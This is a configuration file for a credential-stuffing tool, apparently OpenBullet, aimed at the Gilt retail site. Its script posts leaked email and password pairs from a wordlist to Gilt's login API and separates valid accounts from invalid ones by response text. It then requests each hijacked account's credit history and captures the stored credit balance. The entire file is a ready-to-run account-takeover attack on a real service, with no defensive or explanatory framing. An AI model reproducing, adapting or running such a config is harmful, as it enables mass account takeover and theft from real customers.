[SETTINGS]
{
  "Name": "GILT",
  "SuggestedBots": 1,
  "LastModified": "2018-09-03T04:27:54.8722864+07:00",
  "AdditionalInfo": "",
  "Author": "Covrig",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://www.gilt.com/api/v3/login" AutoRedirect=TRUE 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"rememberMe\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://www.gilt.com" 
  HEADER "Referer: https://www.gilt.com/boutique/" 
  HEADER "X-CSRFToken: null" 
  HEADER "X-NewRelic-ID: XQQEWFVACQEEXFVWAAYH" 
  HEADER "X-Requested-With: XMLHttpRequest" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "This email address and password combination doesn't exist" 
  KEYCHAIN Success OR 
    KEY "userId" 
REQUEST GET "https://www.gilt.com/account/creditHistory/" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Origin: https://www.gilt.com" 
  HEADER "Referer: https://www.gilt.com/boutique/" 
  HEADER "X-CSRFToken: null" 
  HEADER "X-NewRelic-ID: XQQEWFVACQEEXFVWAAYH" 
  HEADER "X-Requested-With: XMLHttpRequest" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "creditHistory: []" 
PARSE "<SOURCE>" LR "creditHistory: [{" "}]" Recursive=FALSE -> CAP "CREDIT:" "" "" 
